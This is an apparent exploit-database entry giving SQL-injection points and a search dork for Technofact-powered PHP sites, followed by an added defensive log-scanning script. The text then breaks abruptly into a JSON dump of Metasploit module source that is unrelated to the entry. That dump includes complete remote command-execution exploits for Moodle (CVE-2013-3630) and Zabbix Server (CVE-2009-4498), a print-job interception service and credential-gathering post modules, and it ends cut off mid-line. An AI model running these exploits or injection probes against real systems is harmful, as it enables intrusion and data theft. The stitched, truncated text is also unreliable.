ID 1337DAY-ID-16320 Type zdt Reporter eXeSoul Modified 2011-06-13T00:00:00
Description
Exploit for php platform in category web applications
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ##################################### 1
0 I'm eXeSoul, a member of the Inj3ct0r Team 1
1 ##################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##################################################################
# Title : Technofact (index/detail) => SQL Injection Vulnerability
#
# Author: eXeSoul
#
# Home : 1337day.com / www.indishell.in or www.andhrahackers.com
#
# Email : exe.soul@live.com
#
# date : 13/6/2011
#
# d0rk:- POWERED BY: WWW.TECHNOFACT.COM
# Poweard By | Technofact
#
#
# category : Web Apps [SQli]
#
##################################################################
##################################################################
#
# [1]
#
# Go To Site :-
#
#
#
# * SQL Injection Vulnerability *
#
#
# http://site.com/index.php?page_id=47' <= SQLI
# http://site.com/solar/index.php?page_id=2' <= SQLI
# http://site.com/detail.php?page_id=5' <= SQLI
#
#
#
# Check all .php?*= parameters; almost all of them are vulnerable to SQLi!
#
# => PROUD TO BE AN INDIAN | Anything for INDIA | JAI-HIND | Maa Tujhe Salam
#
# => c0d3 for motherland, h4ck for motherland
#
#
#
# [#] Done, now time to rock \m/
#
#
#
####################################################################
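The advisory's test is a single quote appended to `page_id` on `index.php`, `solar/index.php` and `detail.php`, with the note that any `.php?*=` parameter should be checked. The block below is an added defender-side example, not code from the advisory author or from Technofact: it scans web-server access log lines for exactly that kind of probe, generalised to every query parameter on any `.php` path, and also applies the check the application itself should have made (a row id such as `page_id` must be an integer). The log lines in `SAMPLE_LOG`, the `NUMERIC_PARAMS` set, the indicator list and the function names are all constructed for this example; the client addresses come from documentation ranges.

```python
"""Flag probable SQL-injection probes against .php?param= endpoints in
access logs. Added example; nothing here is taken from a real deployment."""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed "combined" log lines. Requests 2-4 mimic the advisory's
# quote test on page_id; the rest are ordinary traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Jun/2011:10:01:02 +0000] "GET /index.php?page_id=47 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [13/Jun/2011:10:01:09 +0000] "GET /index.php?page_id=47' HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.5 - - [13/Jun/2011:10:01:15 +0000] "GET /solar/index.php?page_id=2%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.5 - - [13/Jun/2011:10:01:21 +0000] "GET /detail.php?page_id=5%20AND%201=1-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [13/Jun/2011:10:02:00 +0000] "GET /detail.php?page_id=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [13/Jun/2011:10:02:05 +0000] "GET /static/logo.png HTTP/1.1" 200 8800 "-" "Mozilla/5.0"
"""

# Apache/nginx combined format: client, identd, user, [timestamp],
# "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Assumption: page_id is a numeric row id, which is what the advisory's
# URLs suggest. Anything non-numeric in it is already a policy violation.
NUMERIC_PARAMS = {"page_id"}

# Low-noise textual indicators of a quote breakout or boolean/comment probe.
INDICATORS = (
    ("sql comment", re.compile(r"(--|/\*)")),
    ("boolean tautology", re.compile(r"\b(and|or)\b\s+\d+\s*=\s*\d+", re.I)),
)


def classify_value(name, value):
    """Return the indicator labels that fire for one decoded parameter value."""
    hits = []
    if name in NUMERIC_PARAMS and not value.isdigit():
        hits.append("non-numeric id")
    if value.count("'") % 2 == 1:          # a lone quote is the advisory's test
        hits.append("unbalanced quote")
    for label, rx in INDICATORS:
        if rx.search(value):
            hits.append(label)
    return hits


def scan_log(text):
    """Return one finding per (request, parameter) whose value looks like a probe.

    Only requests to .php paths with a query string are examined, so the
    check covers every '.php?*=' parameter, not just page_id.
    """
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith(".php") or not parts.query:
            continue
        # parse_qsl percent-decodes, so %27 and a literal quote are treated alike.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            hits = classify_value(name, value)
            if hits:
                findings.append({
                    "ip": m.group("ip"), "ts": m.group("ts"),
                    "path": parts.path, "param": name, "value": value,
                    "status": m.group("status"), "indicators": hits,
                })
    return findings


def probes_by_ip(findings):
    """Count flagged requests per client, the usual pivot for blocking or review."""
    return dict(Counter(f["ip"] for f in findings))


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["status"], f["path"], f["param"], repr(f["value"]), f["indicators"])
    print(probes_by_ip(scan_log(SAMPLE_LOG)))
```

Two things are worth noting when running this against real logs. A flagged request that also produced a 500 (as the quote probes do in the sample) is the strongest signal, because a server error on a quote-terminated value is exactly how the advisory confirms injectability; and the `non-numeric id` check is the one the application should perform itself, since an integer-typed `page_id` bound through a prepared statement leaves nothing for the appended quote to break out of.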
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
<3 Love: -[SiLeNtp0is0n]-, stRaNgEr(lucky), inX_rOot, NEO H4cK3R, DarkL00k, Th3 RDX,
G00g!3 W@rr!0r, Nazz , str1k3r, co0Lt04d , ATUL DWIVEDI , Jackh4xor , Bon3 ,KnocKout,
Badboy-Albinia, Mr.SK ,X__HMG, AK-47, [ICW] [Andhra Hackers], Ethical N00b,Maxy,Brueni,
[Indishell crew],r00t-Devil , inj3ct0r 1337 team , r0073r , Sid3^effects , r4dc0re , KedAns-Dz
(+)<3 to :Indian Cyber Army & Indishell Crew
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
####################################################################
#
# Bug discovered : 13 Jun 2011
####################################################################
#
# Jay Mahadev.!! Jay shree Ram.!! jay Shree krishna.!! Jay hind.!!
#
####################################################################
# 0day.today [2018-03-20] #
input.gsub(/\\/\\/.*$/, '')\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/x360_video_player_set_text_bof.rb"}, {"lastseen": "2019-11-08T01:19:16", "bulletinFamily": "exploit", "description": "Moodle allows an authenticated user to define spellcheck settings via the web interface. The user can update the spellcheck mechanism to point to a system-installed aspell binary. By updating the path for the spellchecker to an arbitrary command, an attacker can run arbitrary commands in the context of the web application upon spellchecking requests. This module also allows an attacker to leverage another privilege escalation vuln. Using the referenced XSS vuln, an unprivileged authenticated user can steal an admin sesskey and use this to escalate privileges to that of an admin, allowing the module to pop a shell as a previously unprivileged authenticated user. This module was tested against Moodle version 2.5.2 and 2.2.3.\n", "modified": "2019-05-10T18:02:01", "published": "2013-10-30T15:25:48", "id": "MSF:EXPLOIT/MULTI/HTTP/MOODLE_CMD_EXEC", "href": "", "type": "metasploit", "title": "Moodle Remote Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rexml/document'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Moodle Remote Command Execution',\n 'Description' => %q{\n Moodle allows an authenticated user to define spellcheck settings via the web interface.\n The user can update the spellcheck mechanism to point to a system-installed aspell binary.\n By updating the path for the spellchecker to an arbitrary command, an attacker can run\n arbitrary commands in the context of the web application 
upon spellchecking requests.\n\n This module also allows an attacker to leverage another privilege escalation vuln.\n Using the referenced XSS vuln, an unprivileged authenticated user can steal an admin sesskey\n and use this to escalate privileges to that of an admin, allowing the module to pop a shell\n as a previously unprivileged authenticated user.\n\n This module was tested against Moodle version 2.5.2 and 2.2.3.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Brandon Perry <bperry.volatile[at]gmail.com>' # Discovery / msf module\n ],\n 'References' =>\n [\n ['CVE', '2013-3630'],\n ['EDB', '28174'], #xss vuln allowing sesskey of admins to be stolen\n ['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats']\n ],\n 'Payload' =>\n {\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl ruby telnet python',\n }\n },\n 'Platform' => ['unix', 'linux'],\n 'Arch' => ARCH_CMD,\n 'Targets' => [['Automatic',{}]],\n 'DisclosureDate' => 'Oct 30 2013',\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n OptString.new('USERNAME', [ true, \"Username to authenticate with\", 'admin']),\n OptString.new('PASSWORD', [ true, \"Password to authenticate with\", '']),\n OptString.new('SESSKEY', [ false, \"The session key of the user to impersonate\", \"\"]),\n OptString.new('TARGETURI', [ true, \"The URI of the Moodle installation\", '/moodle/'])\n ])\n end\n\n def exploit\n init = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/index.php')\n })\n\n fail_with(Failure::Unreachable, 'No response received from the target.') unless init\n sess = init.get_cookies\n\n post = {\n 'username' => datastore[\"USERNAME\"],\n 'password' => datastore[\"PASSWORD\"]\n }\n\n print_status(\"Authenticating as user: \" << datastore[\"USERNAME\"])\n\n login = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/login/index.php'),\n 'vars_post' => post,\n 
'cookie' => sess\n })\n\n if !login or login.code != 303\n fail_with(Failure::NoAccess, \"Login failed\")\n end\n\n sess = login.get_cookies\n\n print_status(\"Getting session key to update spellchecker if no session key was specified\")\n\n sesskey = ''\n if datastore['SESSKEY'] == ''\n tinymce = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/admin/settings.php') + '?section=editorsettingstinymce',\n 'cookie' => sess\n })\n\n sesskey = tinymce.get_hidden_inputs[1]['sesskey']\n unless sesskey\n fail_with(Failure::UnexpectedReply, \"Unable to get proper session key\")\n end\n else\n sesskey = datastore['SESSKEY']\n end\n\n post = {\n 'section' => 'editorsettingstinymce',\n 'sesskey' => sesskey,\n 'return' => '',\n 's_editor_tinymce_spellengine' => 'PSpellShell',\n 's_editor_tinymce_spelllanguagelist' => '%2BEnglish%3Den%2CDanish%3Dda%2CDutch%3Dnl%2CFinnish%3Dfi%2CFrench%3Dfr%2CGerman%3Dde%2CItalian%3Dit%2CPolish%3Dpl%2CPortuguese%3Dpt%2CSpanish%3Des%2CSwedish%3Dsv'\n }\n\n print_status(\"Updating spellchecker to use the system aspell\")\n\n post = {\n 'section' => 'systempaths',\n 'sesskey' => sesskey,\n 'return' => '',\n 's__gdversion' => '2',\n 's__pathtodu' => '/usr/bin/du',\n 's__aspellpath' => payload.encoded,\n 's__pathtodot' => ''\n }\n\n aspell = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/admin/settings.php'),\n 'vars_post' => post,\n 'cookie' => sess\n })\n\n spellcheck = '{\"id\":\"c0\",\"method\":\"checkWords\",\"params\":[\"en\",[\"\"]]}'\n\n print_status(\"Triggering payload\")\n\n resp = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/lib/editor/tinymce/tiny_mce/3.4.9/plugins/spellchecker/rpc.php'),\n 'data' => spellcheck,\n 'ctype' => 'application/json',\n 'cookie' => sess\n })\n\n if !resp or resp.code != 200\n fail_with(Failure::PayloadFailed, \"Error triggering payload\")\n end\n\n end\nend\n", "cvss": {"score": 4.6, "vector": 
"AV:N/AC:H/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/moodle_cmd_exec.rb"}, {"lastseen": "2019-12-13T01:18:57", "bulletinFamily": "exploit", "description": "This module parses Unattend files in the target directory. See also: post/windows/gather/enum_unattend\n", "modified": "2019-09-01T18:51:13", "published": "2013-04-25T22:01:19", "id": "MSF:AUXILIARY/PARSER/UNATTEND", "href": "", "type": "metasploit", "title": "Auxilliary Parser Windows Unattend Passwords", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/parser/unattend'\n\nclass MetasploitModule < Msf::Auxiliary\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Auxilliary Parser Windows Unattend Passwords',\n 'Description' => %q{\n This module parses Unattend files in the target directory.\n\n See also: post/windows/gather/enum_unattend\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Ben Campbell',\n ],\n 'References' =>\n [\n ['URL', 'http://technet.microsoft.com/en-us/library/ff715801'],\n ['URL', 'http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx'],\n ['URL', 'http://technet.microsoft.com/en-us/library/c026170e-40ef-4191-98dd-0b9835bfa580']\n ],\n ))\n\n register_options([\n OptPath.new('PATH', [true, 'Directory or file to parse.']),\n OptBool.new('RECURSIVE', [true, 'Recursively check for files', false]),\n ])\n end\n\n def run\n if datastore['RECURSIVE']\n ext = \"**/*.xml\"\n else\n ext = \"/*.xml\"\n end\n\n if datastore['PATH'].ends_with?('.xml')\n filepath = datastore['PATH']\n else\n filepath = File.join(datastore['PATH'], ext)\n end\n\n Dir.glob(filepath) do |item|\n print_status \"Processing #{item}\"\n file = File.read(item)\n begin\n xml = REXML::Document.new(file)\n rescue REXML::ParseException => e\n print_error(\"#{item} invalid xml format.\")\n 
vprint_line(e.message)\n next\n end\n\n results = Rex::Parser::Unattend.parse(xml)\n table = Rex::Parser::Unattend.create_table(results)\n print_line table.to_s unless table.nil?\n print_line\n end\n end\nend\n\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/parser/unattend.rb"}, {"lastseen": "2019-11-27T19:17:56", "bulletinFamily": "exploit", "description": "This module is designed to listen for PJL or PostScript print jobs. Once a print job is detected it is saved to loot. The captured printjob can then be forwarded on to another printer (required for LPR printjobs). Resulting PCL/PS files can be read with GhostScript/GhostPCL. Note, this module does not yet support IPP connections.\n", "modified": "2019-03-05T09:38:51", "published": "2012-09-20T16:04:36", "id": "MSF:AUXILIARY/SERVER/CAPTURE/PRINTJOB_CAPTURE", "href": "", "type": "metasploit", "title": "Printjob Capture Service", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TcpServer\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'Printjob Capture Service',\n 'Description' => %q{\n This module is designed to listen for PJL or PostScript print\n jobs. Once a print job is detected it is saved to loot. The\n captured printjob can then be forwarded on to another printer\n (required for LPR printjobs). 
Resulting PCL/PS files can be\n read with GhostScript/GhostPCL.\n\n Note, this module does not yet support IPP connections.\n },\n 'Author' => ['Chris John Riley', 'todb'],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n # Based on previous prn-2-me tool (Python)\n ['URL', 'http://blog.c22.cc/toolsscripts/prn-2-me/'],\n # Readers for resulting PCL/PC\n ['URL', 'http://www.ghostscript.com']\n ],\n 'Actions' => [[ 'Capture' ]],\n 'PassiveActions' => ['Capture'],\n 'DefaultAction' => 'Capture'\n )\n\n register_options([\n OptPort.new('SRVPORT', [ true, 'The local port to listen on', 9100 ]),\n OptBool.new('FORWARD', [ true, 'Forward print jobs to another host', false ]),\n OptAddress.new('RHOST', [ false, 'Forward to remote host' ]),\n OptPort.new('RPORT', [ false, 'Forward to remote port', 9100 ]),\n OptBool.new('METADATA', [ true, 'Display Metadata from printjobs', true ]),\n OptEnum.new('MODE', [ true, 'Print mode', 'RAW', ['RAW', 'LPR']]) # TODO: Add IPP\n\n ])\n\n deregister_options('SSL', 'SSLVersion', 'SSLCert', 'RHOSTS')\n end\n\n def setup\n super\n @state = {}\n\n begin\n\n @srvhost = datastore['SRVHOST']\n @srvport = datastore['SRVPORT'] || 9100\n @mode = datastore['MODE'].upcase || 'RAW'\n if datastore['FORWARD']\n @forward = datastore['FORWARD']\n @rport = datastore['RPORT'] || 9100\n if datastore['RHOST'].nil?\n fail_with(Failure::BadConfig, \"Cannot forward without a valid RHOST\")\n end\n @rhost = datastore['RHOST']\n print_status(\"Forwarding all printjobs to #{@rhost}:#{@rport}\")\n end\n if not @mode == 'RAW' and not @forward\n fail_with(Failure::BadConfig, \"Cannot intercept LPR/IPP without a forwarding target\")\n end\n @metadata = datastore['METADATA']\n print_status(\"Starting Print Server on %s:%s - %s mode\" % [@srvhost, @srvport, @mode])\n\n exploit()\n\n rescue => ex\n print_error(ex.message)\n end\n end\n\n def on_client_connect(c)\n @state[c] = {\n :name => \"#{c.peerhost}:#{c.peerport}\",\n :ip => c.peerhost,\n :port => c.peerport,\n 
:user => nil,\n :pass => nil,\n :data => '',\n :raw_data => '',\n :prn_title => '',\n :prn_type => '',\n :prn_metadata => {},\n :meta_output => []\n }\n\n print_status(\"#{name}: Client connection from #{c.peerhost}:#{c.peerport}\")\n end\n\n def on_client_data(c)\n curr_data = c.get_once\n @state[c][:data] << curr_data\n if @mode == 'RAW'\n # RAW Mode - no further actions\n elsif @mode == 'LPR' or @mode == 'IPP'\n response = stream_data(curr_data)\n c.put(response)\n end\n\n if (Rex::Text.to_hex(curr_data.first)) == '\\x02' and (Rex::Text.to_hex(curr_data.last)) == '\\x0a'\n print_status(\"LPR Jobcmd \\\"%s\\\" received\" % curr_data[1..-2]) if not curr_data[1..-2].empty?\n end\n\n return if not @state[c][:data]\n end\n\n def on_client_close(c)\n print_status(\"#{name}: Client #{c.peerhost}:#{c.peerport} closed connection after %d bytes of data\" % @state[c][:data].length)\n sock.close if sock\n\n # forward RAW data as it's not streamed\n if @forward and @mode == 'RAW'\n forward_data(@state[c][:data])\n end\n\n #extract print data and Metadata from @state[c][:data]\n begin\n # postscript data\n if @state[c][:data] =~ /%!PS-Adobe/i\n @state[c][:prn_type] = \"PS\"\n print_good(\"Printjob intercepted - type PostScript\")\n # extract PostScript data including header and EOF marker\n @state[c][:raw_data] = @state[c][:data].match(/%!PS-Adobe.*%%EOF/im)[0]\n # pcl data (capture PCL or PJL start code)\n elsif @state[c][:data].unpack(\"H*\")[0] =~ /(1b45|1b25|1b26)/\n @state[c][:prn_type] = \"PCL\"\n print_good(\"Printjob intercepted - type PCL\")\n #extract everything between PCL start and end markers (various)\n @state[c][:raw_data] = Array(@state[c][:data].unpack(\"H*\")[0].match(/((1b45|1b25|1b26).*(1b45|1b252d313233343558))/i)[0]).pack(\"H*\")\n end\n # extract Postsript Metadata\n metadata_ps(c) if @state[c][:data] =~ /^%%/i\n\n # extract PJL Metadata\n metadata_pjl(c) if @state[c][:data] =~ /@PJL/i\n\n # extract IPP Metadata\n metadata_ipp(c) if @state[c][:data] =~ 
/POST \\/ipp/i or @state[c][:data] =~ /application\\/ipp/i\n\n if @state[c][:prn_type].empty?\n print_error(\"Unable to detect printjob type, dumping complete output\")\n @state[c][:prn_type] = \"Unknown Type\"\n @state[c][:raw_data] = @state[c][:data]\n end\n\n # output discovered Metadata if set\n if @state[c][:meta_output] and @metadata\n @state[c][:meta_output].sort.each do | out |\n # print metadata if not empty\n print_status(\"#{out}\") if not out.empty?\n end\n else\n print_status(\"No metadata gathered from printjob\")\n end\n\n # set name to unknown if not discovered via Metadata\n @state[c][:prn_title] = 'Unnamed' if @state[c][:prn_title].empty?\n\n #store loot\n storefile(c) if not @state[c][:raw_data].empty?\n\n # clear state\n @state.delete(c)\n\n rescue => ex\n print_error(ex.message)\n end\n end\n\n def metadata_pjl(c)\n # extract PJL Metadata\n\n @state[c][:prn_metadata] = @state[c][:data].scan(/^@PJL\\s(JOB=|SET\\s|COMMENT\\s)(.*)$/i)\n print_good(\"Extracting PJL Metadata\")\n @state[c][:prn_metadata].each do | meta |\n if meta[0] =~ /^COMMENT/i\n @state[c][:meta_output] << meta[0].to_s + meta[1].to_s\n end\n if meta[1] =~ /^NAME|^STRINGCODESET|^RESOLUTION|^USERNAME|^JOBNAME|^JOBATTR/i\n @state[c][:meta_output] << meta[1].to_s\n end\n if meta[1] =~ /^NAME/i\n @state[c][:prn_title] = meta[1].strip\n elsif meta[1] =~/^JOBNAME/i\n @state[c][:prn_title] = meta[1].strip\n end\n end\n end\n\n def metadata_ps(c)\n # extract Postsript Metadata\n\n @state[c][:prn_metadata] = @state[c][:data].scan(/^%%(.*)$/i)\n print_good(\"Extracting PostScript Metadata\")\n @state[c][:prn_metadata].each do | meta |\n if meta[0] =~ /^Title|^Creat(or|ionDate)|^For|^Target|^Language/i\n @state[c][:meta_output] << meta[0].to_s\n end\n if meta[0] =~ /^Title/i\n @state[c][:prn_title] = meta[0].strip\n end\n end\n end\n\n def metadata_ipp(c)\n # extract IPP Metadata\n\n @state[c][:prn_metadata] = @state[c][:data]\n print_good(\"Extracting IPP Metadata\")\n case 
@state[c][:prn_metadata]\n when /User-Agent:/i\n @state[c][:meta_output] << @state[c][:prn_metadata].scan(/^User-Agent:.*/i)\n when /Server:/i\n @state[c][:meta_output] << @state[c][:prn_metadata].scan(/^Server:.*/i)\n when /printer-uri..ipp:\\/\\/.*\\/ipp\\//i\n @state[c][:meta_output] << @state[c][:prn_metadata].scan(/printer-uri..ipp:\\/\\/.*\\/ipp\\//i)\n when /requesting-user-name..\\w+/i\n @state[c][:meta_output] << @state[c][:prn_metadata].scan(/requesting-user-name..\\w+/i)\n end\n end\n\n def forward_data(data_to_send)\n print_status(\"Forwarding PrintJob on to #{@rhost}:#{@rport}\")\n connect\n sock.put(data_to_send)\n sock.close\n end\n\n def stream_data(data_to_send)\n vprint_status(\"Streaming %d bytes of data to #{@rhost}:#{@rport}\" % data_to_send.length)\n connect if not sock\n sock.put(data_to_send)\n response = sock.get_once\n return response\n end\n\n def storefile(c)\n # store the file\n\n if @state[c][:raw_data]\n jobname = File.basename(@state[c][:prn_title].gsub(\"\\\\\",\"/\"), \".*\")\n filename = \"#{jobname}.#{@state[c][:prn_type]}\"\n loot = store_loot(\n \"prn_snarf.#{@state[c][:prn_type].downcase}\",\n \"#{@state[c][:prn_type]} printjob\",\n c.peerhost,\n @state[c][:raw_data],\n filename,\n \"PrintJob capture\"\n )\n print_good(\"Incoming printjob - %s saved to loot\" % @state[c][:prn_title])\n print_good(\"Loot filename: %s\" % loot)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/capture/printjob_capture.rb"}, {"lastseen": "2019-12-13T11:10:59", "bulletinFamily": "exploit", "description": "This module abuses the \"Command\" trap in Zabbix Server to execute arbitrary commands without authentication. By default the Node ID \"0\" is used, if it doesn't work, the Node ID is leaked from the error message and exploitation retried. According to the vendor versions prior to 1.6.9 are vulnerable. 
The vulnerability has been successfully tested on Zabbix Server 1.6.7 on Ubuntu 10.04.\n", "modified": "2017-07-24T13:26:21", "published": "2012-08-23T16:29:39", "id": "MSF:EXPLOIT/LINUX/MISC/ZABBIX_SERVER_EXEC", "href": "", "type": "metasploit", "title": "Zabbix Server Arbitrary Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Zabbix Server Arbitrary Command Execution',\n 'Description' => %q{\n This module abuses the \"Command\" trap in Zabbix Server to execute arbitrary\n commands without authentication. By default the Node ID \"0\" is used, if it doesn't\n work, the Node ID is leaked from the error message and exploitation retried.\n\n According to the vendor versions prior to 1.6.9 are vulnerable. 
The vulnerability\n has been successfully tested on Zabbix Server 1.6.7 on Ubuntu 10.04.\n },\n 'Author' =>\n [\n 'Nicob <nicob[at]nicob.net>', # Vulnerability discovery\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-4498' ],\n [ 'OSVDB', '60965' ],\n [ 'BID', '37989' ],\n [ 'EDB', '10432' ],\n [ 'URL', 'https://support.zabbix.com/browse/ZBX-1030' ]\n ],\n 'Platform' => ['unix'],\n 'Arch' => ARCH_CMD,\n 'Privileged' => false,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Zabbix 1.6.7', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Sep 10 2009'\n ))\n\n register_options(\n [\n Opt::RPORT(10051),\n ])\n end\n\n def send_command(sock, node_id, cmd)\n host_id = Rex::Text.rand_text_numeric(3)\n msg = \"Command\\255\"\n msg << \"#{node_id}\\255\"\n msg << \"#{host_id}\\255\"\n msg << \"#{cmd}\\n\"\n sock.put(msg)\n res = sock.get_once\n return res\n end\n\n def check\n peer = \"#{rhost}:#{rport}\"\n node_id = 0\n clue = Rex::Text.rand_text_alpha(rand(5)+5)\n cmd = \"echo #{clue}\"\n\n connect\n vprint_status(\"Sending 'Command' request...\")\n res = send_command(sock, node_id, cmd)\n disconnect\n\n if res\n vprint_status(res)\n if res =~ /#{clue}/\n return Exploit::CheckCode::Vulnerable\n elsif res =~ /-1/ and res=~ /NODE (\\d*)/\n node_id = $1\n vprint_good(\"Node ID #{node_id} discovered\")\n else\n return Exploit::CheckCode::Safe\n end\n else # No response\n return Exploit::CheckCode::Safe\n end\n\n # Retry with the good node_id\n connect\n vprint_status(\"Sending 'Command' request with discovered Node ID...\")\n res = send_command(sock, node_id, cmd)\n disconnect\n if res and res =~ /#{clue}/\n return Exploit::CheckCode::Vulnerable\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n peer = \"#{rhost}:#{rport}\"\n 
node_id = 0\n cmd = payload.encoded\n\n connect\n print_status(\"Sending 'Command' request...\")\n res = send_command(sock, node_id, cmd)\n disconnect\n\n if res and res =~ /-1/ and res=~ /NODE (\\d*)/\n # Retry with the good node_id\n node_id = $1\n print_good(\"Node ID #{node_id} discovered\")\n connect\n print_status(\"Sending 'Command' request with discovered Node ID...\")\n res = send_command(sock, node_id, cmd)\n disconnect\n end\n\n # Read command output from socket if cmd/unix/generic payload was used\n if (datastore['CMD'])\n if res and res =~ /\\x30\\xad/\n print_good(\"Command executed successfully\")\n print_status(\"Output:\\n#{res.split(\"\\x30\\xad\").last}\")\n else\n print_error(\"Failed to execute the command\")\n end\n end\n\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/zabbix_server_exec.rb"}, {"lastseen": "2019-12-12T03:55:19", "bulletinFamily": "exploit", "description": "This module will check the file system and registry for particular artifacts. The list of artifacts is read from data/post/enum_artifacts_list.txt or a user specified file. 
Any matches are written to the loot.\n", "modified": "2017-07-24T13:26:21", "published": "2012-01-06T22:43:50", "id": "MSF:POST/WINDOWS/GATHER/ENUM_ARTIFACTS", "href": "", "type": "metasploit", "title": "Windows Gather File and Registry Artifacts Enumeration", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'yaml'\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Auxiliary::Report\n include Msf::Post::File\n include Msf::Post::Windows::Registry\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Windows Gather File and Registry Artifacts Enumeration',\n 'Description' => %q{\n This module will check the file system and registry for particular artifacts. The\n list of artifacts is read from data/post/enum_artifacts_list.txt or a user specified file. Any\n matches are written to the loot. },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'averagesecurityguy <stephen[at]averagesecurityguy.info>' ],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n\n register_options(\n [\n OptPath.new( 'ARTIFACTS',\n [\n true,\n 'Full path to artifacts file.',\n ::File.join(Msf::Config.data_directory, 'post', 'enum_artifacts_list.txt')\n ])\n ])\n end\n\n def run\n # Store any found artifacts so they can be written to loot\n evidence = 